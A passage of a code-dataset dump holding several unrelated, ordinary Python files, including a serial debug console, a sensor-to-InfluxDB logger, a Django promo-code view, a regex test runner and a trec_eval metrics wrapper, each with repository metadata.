newLineIndex = self.incomingLine.find('\\n')\n\n def addLineToProperList(self, line):\n if len(line) > 5 and line[0:6] == \"_data_\":\n try:\n self.addGraphData(line[6:])\n except ValueError:\n self.receivedLines_main.append(line)\n elif len(line) > 8 and line[0:9] == \"_warning_\":\n self.receivedLines_warning.append(line[9:])\n elif len(line) > 7 and line[0:7] == \"_error_\":\n splittedLine = line.split(\"_\")\n errorLine = \"#\" + splittedLine[2] + \"# \"\n for s in splittedLine[3:]:\n errorLine += s\n self.receivedLines_error.append(errorLine)\n else:\n self.receivedLines_main.append(line)\n\n def addGraphData(self, strData):\n data = strData.split(\"_\")\n idChannel = int(data[0])\n channels = self.getChannelsFromID(idChannel)\n\n values = []\n for strValue in data[1:]:\n values.append(float(strValue))\n\n for graph in ['graph1', 'graph2', 'graph3', 'graph4']:\n gChannel = self._graphsChannels[graph]\n if gChannel in channels and self._enChannels[graph]:\n lines = self._channelsDataStructure[gChannel].lineNames\n for lineName, ids in lines.items():\n if ids[0] == idChannel:\n if len(ids) == 2: # One dimension data\n if len(values) <= 1:\n raise ValueError\n self.graphData[graph]['data'][lineName].append(values[ids[1]])\n elif len(ids) == 3: # Two dimensions data\n if len(values) <= 2:\n raise ValueError\n self.graphData[graph]['data'][lineName][0].append(values[ids[1]])\n self.graphData[graph]['data'][lineName][1].append(values[ids[2]])\n\n\n def setEnabledChannels(self, competeConfig):\n newGraphsChannels = {'graph1': competeConfig['graph1']['channel'],\n 'graph2': competeConfig['graph2']['channel'],\n 'graph3': competeConfig['graph3']['channel'],\n 'graph4': competeConfig['graph4']['channel']}\n newEnabledList = {'graph1': competeConfig['graph1']['enable'],\n 'graph2': competeConfig['graph2']['enable'],\n 'graph3': competeConfig['graph3']['enable'],\n 'graph4': 
competeConfig['graph4']['enable']}\n\n commandLines = []\n graphs = ['graph1', 'graph2', 'graph3', 'graph4']\n for graph in graphs:\n if newGraphsChannels[graph] != self._graphsChannels[graph]:\n if self._enChannels[graph]:\n commandLines += self.enableChannel(self._graphsChannels[graph], False)\n else:\n if newEnabledList[graph] != self._enChannels[graph]:\n if not newEnabledList[graph]:\n commandLines += self.enableChannel(self._graphsChannels[graph], False)\n\n for graph in graphs:\n if newGraphsChannels[graph] != self._graphsChannels[graph]:\n if newEnabledList[graph]:\n self.resetGraphData(graph, newGraphsChannels[graph])\n commandLines += self.enableChannel(newGraphsChannels[graph], True)\n else:\n if newEnabledList[graph] != self._enChannels[graph]:\n if newEnabledList[graph]:\n self.resetGraphData(graph, newGraphsChannels[graph])\n commandLines += self.enableChannel(self._graphsChannels[graph], True)\n\n self._graphsChannels = newGraphsChannels\n self._enChannels = newEnabledList\n return commandLines\n\n def enableChannel(self, channel, enable):\n commandLines = []\n ids = self.getIDsFromChannel(channel)\n for i in ids:\n if enable:\n commandLine = \"logon \"\n else:\n commandLine = \"logoff \"\n commandLine += str(i)\n commandLine += '\\n'\n self.addLinesToSend([commandLine])\n commandLines.append(commandLine)\n return commandLines\n\n def resetGraphData(self, graph, channel):\n cData = self._channelsDataStructure[channel]\n self.graphData[graph]['shape'] = cData.shape\n initData = self._shapeInitData[cData.shape]\n initDict = {}\n for name in cData.lineNames:\n initDict[name] = copy.deepcopy(initData)\n self.graphData[graph]['data'] = copy.deepcopy(initDict)\n\n def getLines_main(self):\n lines = copy.deepcopy(self.receivedLines_main)\n self.receivedLines_main.clear()\n return lines\n\n def getLines_warning(self):\n lines = copy.deepcopy(self.receivedLines_warning)\n self.receivedLines_warning.clear()\n return lines\n\n def getLines_error(self):\n lines = copy.deepcopy(self.receivedLines_error)\n self.receivedLines_error.clear()\n return lines\n\n def addLinesToSend(self, lines):\n self.linesToSend += lines\n\n def clearLinesToSend(self):\n self.linesToSend = []\n\n def getAllData(self):\n # y = np.multiply(np.sin(np.linspace(0, 6 * np.pi, 100) + self.phase[self.index]), self.index/20)\n # y2 = np.multiply(np.sin(np.linspace(0, 6 * np.pi, 100) + (self.phase[self.index] + 0.1)), self.index/30)\n # self.index = int(math.fmod((self.index + 1), len(self.phase)))\n # return {'graph1': {'data': {'pwm': y, 'bite': y2}, 'shape': 'line'},\n # 'graph2': {'data':\n # {'traj': [[0,1,5*random.random(),9,12,6,3],[0,2,3,6*random.random(),7,2,-3]],\n # 'bite': [[0, 2, 4 * random.random(), 9, 12, 7, 3],\n # [3, 2, 3, 5 * random.random(), 3, 2, -1]]},\n # 'shape': 'scatter'},\n # 'graph3': {'data': {}, 'shape': 'line'},\n # 'graph4': {'data': {}, 'shape': 'line'}\n # }\n\n for graph in ['graph1', 'graph2', 'graph3', 'graph4']:\n if self.graphData[graph]['data'] is not None:\n for key, value in self.graphData[graph]['data'].items():\n if len(value) > 1000:\n value = value[len(value) - 1000:]\n #print(key, value)\n return self.graphData\n\n\nclass channelData:\n def __init__(self, shape, lineNames):\n self.shape = shape\n self.lineNames = 
lineNames","repo_name":"INTechSenpai/moon-rover","sub_path":"debug_tools/python_debug_console/AsciiSerial.py","file_name":"AsciiSerial.py","file_ext":"py","file_size_in_byte":11638,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12926481157","text":"import argparse\nimport os\nimport shutil\nimport sys\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Copy a Dart package')\n\n parser.add_argument(\n '--source', type=str, help='Source directory assembled by dart_pkg.py'\n )\n parser.add_argument(\n '--dest', type=str, help='Destination directory for the package'\n )\n\n args = parser.parse_args()\n\n if os.path.exists(args.dest):\n shutil.rmtree(args.dest)\n\n # dart_pkg.py will create a packages directory within the package.\n # Do not copy this into the release output.\n shutil.copytree(\n args.source, args.dest, ignore=shutil.ignore_patterns('packages')\n )\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"flutter/engine","sub_path":"sky/tools/dist_dart_pkg.py","file_name":"dist_dart_pkg.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":6866,"dataset":"github-code","pt":"37"} +{"seq_id":"28646563680","text":"import time\nimport configparser\nimport Adafruit_DHT\nfrom influxdb import InfluxDBClient\n\n# Configuration File\nCONFIG_FILE = \"settings.conf\"\n\ndef get_reading(config):\n # InfluxDB connection info\n host = config['influxdb_settings']['host']\n port = config['influxdb_settings']['port']\n user = config['influxdb_settings']['user']\n password = config['influxdb_settings']['password']\n dbname = config['influxdb_settings']['dbname']\n\n # Create the InfluxDB client object\n client = InfluxDBClient(host, port, user, password, dbname)\n\n # Sensor details\n #sensor = str(config['sensor_settings']['sensor'])\n sensor = Adafruit_DHT.DHT22\n sensor_gpio = config['sensor_settings']['sensor_gpio_pin']\n measurement = config['sensor_settings']['measurement']\n location = config['sensor_settings']['location']\n\n humidity, celcius = Adafruit_DHT.read_retry(sensor, sensor_gpio)\n if humidity is None:\n print (\"Humidity is null, possibly an err code.\")\n return\n if humidity > 100 or humidity < 0 :\n print (\"Humidity is abnormal, possibly an err code : \" + str(humidity))\n return\n \n # Add Farhenheit for us 'Mericans\n farhenheit = celcius * 9 / 5 + 32\n\n # Structure Timestamp to UTC\n current_time = time.gmtime()\n timestamp = time.strftime('%Y-%m-%dT%H:%M:%SZ', current_time)\n\n #Dew Point\n dew_point = celcius - ((100 - humidity) / 5)\n\n #Heat Index\n heat_index = - 42.379 + (2.04901523 * farhenheit) + (10.14333127 * humidity) - (0.22475541 * farhenheit * humidity) - (6.83783*(10**-3)*farhenheit**2) - (5.481717 * (10**-2) * humidity**2) + (1.22874 * (10**-3) * farhenheit**2 * humidity) + (8.5282*(10**-4) * farhenheit * humidity**2) - (1.99*(10**-6) * farhenheit**2 * humidity**2)\n\n # Structure the data for write\n data = [\n {\n \"measurement\": measurement,\n \"tags\": {\n \"location\": location,\n },\n \"time\": timestamp,\n \"fields\": {\n \"temperature_c\": celcius,\n \"temperature_f\": farhenheit,\n \"humidity\": humidity,\n \"dew_point\": dew_point,\n \"heat_index_f\": heat_index,\n \"heat_index_c\": (heat_index - 32) * 5/9 \n }\n }\n ]\n\n # Write it!\n client.write_points(data)\n\n # Return the temperature value.\n return data\n\n\ndef read_config():\n cfg = configparser.ConfigParser()\n\n # Read the config\n 
cfg.read(CONFIG_FILE)\n\n # Read the Values from the config\n config = {section: {k: v for k, v in cfg.items(section)} for section in cfg.sections()}\n\n # Return the config\n return config\n\n\ndef main():\n # Initial threshold counter.\n threshold_counter = []\n\n # Read the config\n config = read_config()\n\n while True:\n\n try:\n\n # Get the reading and send to Influx\n current_temperature = get_reading(config)\n\n except Exception as e:\n print(e)\n\n # Loop Complete - Sleep for 15 seconds\n time.sleep(15)\n\nif __name__ == '__main__':\n main()\n","repo_name":"prafiles/iot-sensors","sub_path":"sensor-iot.py","file_name":"sensor-iot.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"}
{"seq_id":"72309686133","text":"from django.shortcuts import render, redirect\nfrom django.utils import timezone\nfrom django.views.decorators.http import require_POST\nfrom .models import PromoCode\nfrom .forms import PromoCodeApplyForm\n\n\n@require_POST\ndef promo_code_apply(request):\n now = timezone.now()\n form = PromoCodeApplyForm(request.POST)\n if form.is_valid():\n code = form.cleaned_data['code']\n try:\n promo_code = PromoCode.objects.get(code__iexact=code,\n valid_from__lte=now,\n valid_to__gte=now,\n active=True)\n request.session['promo_code_id'] = promo_code.id\n except PromoCode.DoesNotExist:\n request.session['promo_code_id'] = None\n return redirect('cart:cart_detail')\n","repo_name":"arturkuchynski/ecom","sub_path":"ecom/promos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"482","text":"def error_check(content):\n try:\n num_check = content[1:]\n\n except IndexError:\n return True\n\n for number in num_check:\n\n try:\n _ = int(number)\n\n except ValueError:\n return True\n\n return False\n\n\ndef cal_ratio(inhabitant, cases):\n per_100ths = 100000\n\n ratio_per_100ths = cases / inhabitant * per_100ths\n\n return ratio_per_100ths\n\n\ndef travel_rest_def(ratio_per_100ths):\n travel_rest = 1\n\n if ratio_per_100ths >= 8:\n travel_rest = 2\n\n else:\n pass\n\n return travel_rest\n\n\ndef main():\n filename = input(\"Enter the name of the file to be read:\\n \")\n # filename = \"statistics2.txt\"\n amount = []\n\n\n try:\n open_file = open(filename, 'r')\n\n for line in open_file:\n line = line.strip()\n\n # Skip empty lines\n if line == \"\":\n print(f\"Incorrect line: {line}\")\n continue\n\n content = line.split(\",\")\n\n error = error_check(content)\n\n if error:\n print(f\"Incorrect number in line: {line}\")\n continue\n\n try:\n country = content[0]\n inhabitant = int(content[1])\n cases = int(content[2])\n\n except IndexError:\n print(f\"Incorrect line: {line}\")\n continue\n\n ratio_per_100ths = cal_ratio(inhabitant, cases)\n\n travel_rest = travel_rest_def(ratio_per_100ths)\n\n amount.append(travel_rest)\n\n if travel_rest == 2:\n print(f\"{country:s} ({ratio_per_100ths:.1f} cases per 100000 inhabitants): travel restrictions apply.\")\n\n else:\n print(f\"{country:s} ({ratio_per_100ths:.1f} cases per 100000 inhabitants): no travel restrictions.\")\n\n if amount.count(2) > 0:\n print(f\"Travel restrictions apply to {amount.count(2):d} countries.\")\n\n else:\n print(\"There were no countries in the file.\")\n\n except FileNotFoundError:\n print(f\"Error in reading the file {filename}. 
Program ends.\")\n\n except OSError:\n print(\"There were no countries in the file.\")\n\n\nmain()\n","repo_name":"KazuichiroTaira/CS_A1111","sub_path":"PracticeExam/Task3/travelrestriction.py","file_name":"travelrestriction.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13047624725","text":"from cavachon.config.config_mapping.ConfigMapping import ConfigMapping\r\nfrom cavachon.config.config_mapping.FilterConfig import FilterConfig\r\nfrom cavachon.environment.Constants import Constants\r\nfrom cavachon.utils.GeneralUtils import GeneralUtils\r\nfrom copy import deepcopy\r\nfrom typing import Any, List, Mapping\r\n\r\nclass ModalityConfig(ConfigMapping):\r\n \"\"\"ModalityConfig\r\n\r\n Config for modality.\r\n\r\n Attributes\r\n ----------\r\n name: str\r\n name of the modality.\r\n \r\n samples: List[str]\r\n names of the samples.\r\n\r\n type: str\r\n modality type.\r\n\r\n dist: str\r\n distribution name of the modality.\r\n\r\n h5ad: str\r\n filename to the h5ad (if not provided with samples)\r\n\r\n filters: List[FilterConfig]\r\n filter step configs for the modality.\r\n\r\n \"\"\"\r\n def __init__(self, **kwargs: Mapping[str, Any]):\r\n \"\"\"Constructor for ModalityConfig. \r\n\r\n Parameters\r\n ----------\r\n name: str\r\n name of the modality.\r\n\r\n type: str\r\n modality type.\r\n\r\n dist: str, optional\r\n the data distribution of the modality. Currently supports \r\n `'IndependentBernoulli'` and \r\n `'IndependentZeroInflatedNegativeBinomial'` \r\n (see `cavachon/distributions` for more details). Defaults to:\r\n 1. `'IndependentBernoulli'` for `type:atac`.\r\n 2. `'IndependentZeroInflatedNegativeBinomial'` for `type:rna`.\r\n\r\n samples: List[str]\r\n names of the samples.\r\n\r\n h5ad: str, optional\r\n filename to the h5ad (if not provided with samples)\r\n\r\n filters: List[FilterConfig]\r\n filter step configs for the modality.\r\n \r\n batch_effect_colnames: List[str]\r\n the column names of the batch effects that needs to be corrected.\r\n\r\n \"\"\"\r\n # change default values here\r\n self.name: str\r\n self.type: str\r\n self.dist: str\r\n self.samples: List[str] = list()\r\n self.h5ad: str = ''\r\n self.filters: List[FilterConfig] = list()\r\n self.batch_effect_colnames: List[str] = list()\r\n\r\n # preprocess\r\n kwargs = deepcopy(kwargs)\r\n ## name\r\n name = kwargs.get('name')\r\n kwargs['name'] = GeneralUtils.tensorflow_compatible_str(name)\r\n \r\n ## modality type\r\n modality_type = kwargs.get(Constants.CONFIG_FIELD_MODALITY_TYPE).lower()\r\n kwargs[Constants.CONFIG_FIELD_MODALITY_TYPE] = modality_type\r\n \r\n ## filters\r\n if Constants.CONFIG_FIELD_MODALITY_FILTER in kwargs:\r\n filter_configs = kwargs.get(Constants.CONFIG_FIELD_MODALITY_FILTER)\r\n filter_configs = [FilterConfig(**x) for x in filter_configs]\r\n kwargs[Constants.CONFIG_FIELD_MODALITY_FILTER] = filter_configs\r\n\r\n ## dist\r\n if Constants.CONFIG_FIELD_MODALITY_DIST not in kwargs:\r\n self.dist = Constants.DEFAULT_MODALITY_DISTRIBUTION.get(modality_type)\r\n\r\n super().__init__(\r\n kwargs, \r\n [\r\n 'name',\r\n 'type',\r\n 'dist',\r\n 'samples', \r\n 'h5ad',\r\n 'filters',\r\n 'batch_effect_colnames'\r\n ])\r\n 
","repo_name":"dn070017/CAVACHON","sub_path":"cavachon/config/config_mapping/ModalityConfig.py","file_name":"ModalityConfig.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75095252853","text":"from sklearn.model_selection import train_test_split\n\ndef split_strat_train_val_test(\n df_input, stratify_colname='y', random_state=123,\n frac_train=0.8, frac_val=0.10, frac_test=0.10):\n if frac_train + frac_val + frac_test != 1.0:\n raise ValueError('fractions %f, %f, %f do not add up to 1.0' % \\\n (frac_train, frac_val, frac_test))\n if stratify_colname not in df_input.columns:\n raise ValueError('%s is not a column in the dataframe' % stratify_colname)\n X = df_input\n y = df_input[[stratify_colname]]\n df_train, df_temp, y_train, y_temp = train_test_split(\n X, y, stratify=y, test_size=(1.0 - frac_train), random_state=random_state)\n relative_frac_test = frac_test / (frac_val + frac_test)\n df_val, df_test, y_val, y_test = train_test_split(\n df_temp, y_temp, stratify=y_temp, test_size=relative_frac_test, random_state=random_state)\n assert len(df_input) == len(df_train) + len(df_val) + len(df_test)\n return df_train, df_val, df_test","repo_name":"leletheprogrammer/SA_Progetto","sub_path":"splitting.py","file_name":"splitting.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71356829494","text":"#!/usr/bin/env python\n\nimport os\nimport sys\n\nfrom setuptools import setup\nfrom cssbeautifier.__version__ import __version__\n\nfrom setuptools.command.test import test as TestCommand\n\nDIR_CSS = \"cssbeautifier/tests/\"\n\n\nclass PyTestCSS(TestCommand):\n user_options = [(\"pytest-args=\", \"a\", \"Arguments to pass to py.test\")]\n\n def initialize_options(self):\n TestCommand.initialize_options(self)\n self.pytest_args = [\"--assert=plain\"] + [\n DIR + x for x in os.listdir(DIR) if x.endswith(\".py\") and x[0] not in \"._\"\n ]\n\n def run_tests(self):\n # import here, cause outside the eggs aren't loaded\n import pytest\n\n errno = pytest.main(self.pytest_args)\n sys.exit(errno)\n\n\nsetup(\n name=\"cssbeautifier\",\n version=__version__,\n description=\"CSS unobfuscator and beautifier.\",\n long_description=(\"Beautify, unpack or deobfuscate CSS\"),\n author=\"Liam Newman, Einar Lielmanis, et al.\",\n author_email=\"team@beautifier.io\",\n url=\"https://beautifier.io\",\n entry_points={\"console_scripts\": [\"css-beautify = cssbeautifier:main\"]},\n packages=[\n \"cssbeautifier\",\n \"cssbeautifier.tests\",\n \"cssbeautifier.tests.generated\",\n \"cssbeautifier.css\",\n ],\n install_requires=[\"jsbeautifier\", \"six>=1.13.0\", \"editorconfig>=0.12.2\"],\n license=\"MIT\",\n test_suite=\"pytest.collector\",\n cmdclass={\"test\": PyTestCSS},\n)\n","repo_name":"beautify-web/js-beautify","sub_path":"python/setup-css.py","file_name":"setup-css.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":8320,"dataset":"github-code","pt":"21"} +{"seq_id":"33874559855","text":"# G00362383 - Michael Mulholland\n\n# Ian, here's at great website that you might be interested in.\n# Convert simple regular expressions to nondeterministic finite automaton.\n# https://cyberzhg.github.io/toolbox/regex2nfa?regex=YSti\n\n# import the match method from the regex.py file\nfrom regex import match\n\n# import unittest - it is a unit testing 
framework\nimport unittest\n\n# import the test_program.py file\nimport test_program\n\n# imported for the command-line interface\nimport argparse\n\ndef main():\n\n # writing to a file\n f = open(\"regExpResults.txt\", \"a\")\n \n # command line argument -h \n # program description\n parser = argparse.ArgumentParser(\n description = \"A program using the Python programming language that\\\n can build a non-deterministic finite automation (NFA) from\\\n a regular expression. This program will use the NFA to check\\\n if the regular expression matches any given string of text.\"\n )\n\n # command line argument group.\n # allows for us to specify options that conflict with each other.\n group = parser.add_mutually_exclusive_group()\n \n # command line argument -V or --version. Displays the python version\n group.add_argument(\"-V\", \"--version\", help=\"show program version\", \n action=\"store_true\")\n \n # command line argument -r or --run. \n # Brief description on how to run the program\n group.add_argument(\"-r\", \"--run\", help=\"how to run the program\", \n action=\"store_true\")\n \n # command line argument -v or --verbose. \n # Displays results of pre-written tests in more detail\n group.add_argument(\"-v\", \"--verbose\", help=\"Displays results of\\\n pre-written tests in more detail\", action=\"store_true\")\n \n # command line argument -q or --quite. \n # Displays results of pre-written tests in less detail\n group.add_argument(\"-q\", \"--quite\", help=\"Displays results of\\\n pre-written tests in less detail\", action=\"store_true\")\n\n # parse the args\n args = parser.parse_args()\n\n print()\n # displays python version\n if args.version:\n print(\"Python Version: 3.8.2\")\n print()\n exit()\n # Brief description on how to run the program\n elif args.run:\n print(\"How to run the program: Select one of the following options:\")\n print(\"\\tOption 1: enter your own regular expression and String. \" +\n \"If the regular expression regex matches the string, \" +\n \"TRUE will be returned. 
If it does not match, FALSE will be returned.\")\n print(\"\\tOption 2: runs a number pre-written tests.\")\n print(\"\\tOption 3: is to quit the program.\")\n print()\n exit()\n\n while True:\n # user to select one of three options\n print()\n print(\"Select one of the following options:\")\n print(\"Enter 1: to test your own regular expression and String.\")\n print(\"Enter 2: to test pre-written tests.\")\n print(\"Enter 3: to quit the program.\")\n choice = input(\"Please select one of the above: \") \n \n #If yes then ask for the following input and match it\n if choice == '1':\n print()\n # input from console - \n # https://pynative.com/python-input-function-get-user-input/\n # get the regular expresson from user input\n regex = input(\"Enter the regular expression: \")\n\n # get the String from user input\n s = input(\"Enter string: \")\n print()\n\n if args.verbose:\n # The match() function will return TRUE \n # if the regular expression regex matches the string.\n # It returns FALSE otherwise\n print(\"The regular expression is: \" + regex, \n \" the String is: \" + s, \" Match: \", match(regex, s))\n elif args.quite:\n print(regex, \" \" + s, \" \", match(regex, s))\n else: \n print(\"Regex: \" + regex, \" String: \" + s, \n \" Match: \", match(regex, s))\n\n strRegex = \"Regex: \"\n inputRegex = regex\n strString = \" String: \"\n inputString = s\n strMatch = \" Match: \"\n boolResult = match(regex, s)\n newLine = \"\\n\"\n\n # concat all the variable to allow writing to file\n strConcat = strRegex + inputRegex + strString + inputString\\\n + strMatch + str(boolResult) + newLine\n\n # write the users input to a file\n f.write(strConcat)\n \n elif choice == '2':\n # Print out of the tests and expected result\n # just so the user can see something\n \n # Array of regular expressions\n regex = [\"b.c\", \"a.b|b*\", \"a|c.b*\", \"c*.b\", \"a+b\", \"a+b.c\", \"b?\"]\n # Array of strings \n stringsArr = [\"bcccc\", \"bbb\", \"abc\", \"bc\", \"ccccccb\", \n \"abccd\", \"a\", \"\"]\n \n if args.verbose:\n # Nested for loop to compare each index of the regex array with \n # every index of the strings array to see if they match\n for reg in regex:\n print()\n for s in stringsArr:\n print(\"The regular expression is: \" + reg, \n \" the String is: \" + s, \" Match: \", match(reg, s))\n\n elif args.quite:\n # Nested for loop to compare each index of the regex array with \n # every index of the strings array to see if they match\n for reg in regex:\n print()\n for s in stringsArr:\n print(\"Regex: \" + reg, \" String: \" + s, \n \" Match: \", match(reg, s))\n\n else: \n print()\n # The above tests will allow the user to see the tests and\n # expected result. 
The below test will only return OK if all \n # tests pass or FAILED if one test fails\n # The below runs unittest from the test_progam.py\n # https://stackoverflow.com/questions/31559473/run-unittests-from-a-different-file\n print(\"unittest from the test_program.py file\")\n print()\n suite = unittest.TestLoader().loadTestsFromModule(test_program)\n unittest.TextTestRunner(verbosity=2).run(suite) \n\n else:\n print()\n # quiting the program\n print(\"The program has now finished.\")\n exit()\n\n f.close()\nmain()\n","repo_name":"Michael-Mulholland/Graph-Theory-Project","sub_path":"runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74147100532","text":"import os\nimport subprocess\nimport time\n\n\ndef get_map_mrr(qids, predictions, labels, device=0, keep_results=False):\n \"\"\"\n Get the map and mrr using the trec_eval utility.\n qids, predictions, labels should have the same length.\n device is not a required parameter, it is only used to prevent potential naming conflicts when you\n are calling this concurrently from different threads of execution.\n :param qids: query ids of predictions and labels\n :param predictions: iterable of predictions made by the models\n :param labels: iterable of labels of the dataset\n :param device: device (GPU index or -1 for CPU) for identification purposes only\n \"\"\"\n qrel_fname = 'trecqa_{}_{}.qrel'.format(time.time(), device)\n results_fname = 'trecqa_{}_{}.results'.format(time.time(), device)\n qrel_template = '{qid} 0 {docno} {rel}\\n'\n results_template = '{qid} 0 {docno} 0 {sim} castor-model\\n'\n with open(qrel_fname, 'w') as f1, open(results_fname, 'w') as f2:\n docnos = range(len(qids))\n for qid, docno, predicted, actual in zip(qids, docnos, predictions, labels):\n f1.write(qrel_template.format(qid=qid, docno=docno, rel=actual))\n f2.write(results_template.format(qid=qid, docno=docno, sim=predicted))\n\n trec_eval_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'trec_eval-9.0.5/trec_eval')\n trec_out = subprocess.check_output([trec_eval_path, '-m', 'map', '-m', 'recip_rank', qrel_fname, results_fname])\n trec_out_lines = str(trec_out, 'utf-8').split('\\n')\n mean_average_precision = float(trec_out_lines[0].split('\\t')[-1])\n mean_reciprocal_rank = float(trec_out_lines[1].split('\\t')[-1])\n\n if keep_results:\n print(\"Saving prediction file to {}\".format(results_fname))\n print(\"Saving qrel file to {}\".format(qrel_fname))\n else:\n os.remove(results_fname)\n os.remove(qrel_fname)\n\n return mean_average_precision, mean_reciprocal_rank\n","repo_name":"castorini/castor","sub_path":"utils/relevancy_metrics.py","file_name":"relevancy_metrics.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"21"} +{"seq_id":"39172955921","text":"import datetime\nfrom io import BytesIO\n\nimport networkx as nx\nimport cv2 as cv\nimport numpy as np\n\nimport fpdf\nimport xlsxwriter\nfrom PIL import Image\n\n\nclass TextDrawer:\n def __init__(self, font_face, font_scale, font_thickness):\n self.font_face = font_face\n self.font_scale = font_scale\n self.font_thickness = font_thickness\n\n def draw_texts(self, image, texts, center_coords):\n assert len(texts) == len(center_coords)\n rectangle_size = self._get_max_text_size(texts)\n for text, center_coord in zip(texts, center_coords):\n self._draw_text(image, text, 
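# A usage sketch for get_map_mrr above. It shells out to the bundled trec_eval
# binary, so it only runs where utils/trec_eval-9.0.5 has been built; the toy
# ranking below puts the relevant document first in both queries, so both
# scores come back as 1.0:
qids = [1, 1, 2, 2]
predictions = [0.9, 0.2, 0.3, 0.7]
labels = [1, 0, 0, 1]
mean_ap, mean_rr = get_map_mrr(qids, predictions, labels)
print(mean_ap, mean_rr)  # 1.0 1.0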
center_coord, rectangle_size)\n\n def _get_max_text_size(self, texts):\n return max(max(cv.getTextSize(text, self.font_face, self.font_scale, self.font_thickness)[0]) for text in texts)\n\n def _draw_text(self, image, text, center_coord, rectangle_size, fill_color=(255, 255, 255), text_color=(0, 0, 0),\n line_color=(255, 0, 0), line_thickness=0):\n coord1 = center_coord - rectangle_size / 2\n coord2 = center_coord + rectangle_size / 2\n\n text_size, _ = cv.getTextSize(text, self.font_face, self.font_scale, self.font_thickness)\n offset = (0, rectangle_size) + ((np.repeat(rectangle_size, 2) - text_size) / 2) * (1, -1)\n\n pt1 = self._parse_point(coord1)\n pt2 = self._parse_point(coord2)\n\n if line_thickness > 0:\n cv.rectangle(image, pt1, pt2, line_color, line_thickness)\n\n cv.rectangle(image, pt1, pt2, fill_color, -1)\n cv.putText(image, text, self._parse_point(coord1 + offset), self.font_face, self.font_scale, text_color,\n self.font_thickness, cv.LINE_AA)\n\n @staticmethod\n def _parse_point(coord):\n return tuple(coord.astype(\"int\"))\n\n\nclass ReportGenerator:\n class PDFReport(fpdf.FPDF, fpdf.HTMLMixin):\n pass\n\n def __init__(self, networkx_graphs, image_filename, dictionary_filename, original_image_filepath,\n color_per_type_filepath, color_per_object_data, mm_per_px=None):\n self.mm_per_px = mm_per_px\n self.networkx_graphs = networkx_graphs\n self.found_objects = self._get_found_objects()\n self.color_per_type_filepath = color_per_type_filepath\n self.original_image_filepath = original_image_filepath\n self.dictionary_filename = dictionary_filename\n self.image_filename = image_filename\n self.info_items = self._get_info_items()\n self.object_numbers_filename = \"object_numbers.png\"\n Image.fromarray(self._draw_object_numbers(color_per_object_data)).save(self.object_numbers_filename)\n self.image_height, self.image_width, _ = color_per_object_data.shape\n\n def _get_found_objects(self):\n return dict(enumerate(self._flatten_list(\n self._flatten_list(nx.get_node_attributes(graph, \"found_objects\").values()) for graph in\n self.networkx_graphs), start=1))\n\n @staticmethod\n def _flatten_list(list_of_lists):\n return [item for sublist in list_of_lists for item in sublist]\n\n def _draw_object_numbers(self, image_data):\n f = 4\n resized_data = cv.resize(image_data, None, fx=f, fy=f)\n text_drawer = TextDrawer(cv.FONT_HERSHEY_SCRIPT_SIMPLEX, 1.0, 1)\n text_drawer.draw_texts(\n resized_data,\n [str(number) for number in self.found_objects.keys()],\n [np.flip(found_object[\"center_coords\"]) * f for found_object in self.found_objects.values()]\n )\n return resized_data\n\n def _generate_pdf_report(self, pdf):\n pdf.add_page()\n pdf.set_font(\"Arial\")\n\n pdf.set_font_size(20)\n pdf.cell(w=0, h=15, ln=1, txt=\"Found Objects\", align=\"L\")\n\n self._write_report_info(pdf)\n self._write_object_count(pdf)\n\n width_mm = pdf.fw - pdf.l_margin - pdf.r_margin\n height_mm = self.image_height * (width_mm / self.image_width)\n\n pdf.set_font_size(8)\n\n pdf.add_page()\n pdf.image(self.original_image_filepath, w=width_mm, h=height_mm)\n pdf.cell(w=0, h=6, ln=1, txt=\"Original Image\", align=\"C\")\n\n pdf.add_page()\n pdf.image(self.color_per_type_filepath, w=width_mm, h=height_mm)\n pdf.cell(w=0, h=6, ln=1, txt=\"Objects by Type\", align=\"C\")\n\n pdf.add_page()\n pdf.image(self.object_numbers_filename, w=width_mm, h=height_mm)\n pdf.cell(w=0, h=6, ln=1, txt=\"Objects by Number\", align=\"C\")\n\n pdf.add_page()\n self._write_object_features(pdf, \"px\")\n pdf.cell(w=0, h=9, ln=1,\n 
txt=\"1 mm per px = {}\".format(self.mm_per_px if self.mm_per_px is not None else \"(Not available)\"),\n align=\"L\")\n\n if self.mm_per_px is None:\n return\n\n pdf.add_page()\n self._write_object_features(pdf, \"mm\")\n\n def _get_info_items(self):\n return [\n (\"Image file\", self.image_filename),\n (\"Dictionary file\", self.dictionary_filename),\n (\"Report generation date\", datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n ]\n\n def _write_report_info(self, pdf):\n pdf.set_font_size(16)\n pdf.cell(w=0, h=12, ln=1, txt=\"Info\", align=\"L\")\n pdf.set_font_size(12)\n for k, v in self.info_items:\n pdf.cell(w=0, h=9, ln=1, txt=\"{}: {}\".format(k, v), align=\"L\")\n\n def _write_object_count(self, pdf):\n pdf.set_font_size(16)\n pdf.cell(w=0, h=12, ln=1, txt=\"Object Count\", align=\"L\")\n pdf.set_font_size(12)\n count = {object_type: self._count_found_objects(object_type) for object_type in self._get_found_object_types()}\n for k, v in count.items():\n pdf.cell(w=0, h=9, ln=1, txt=\"Objects of type '{}': 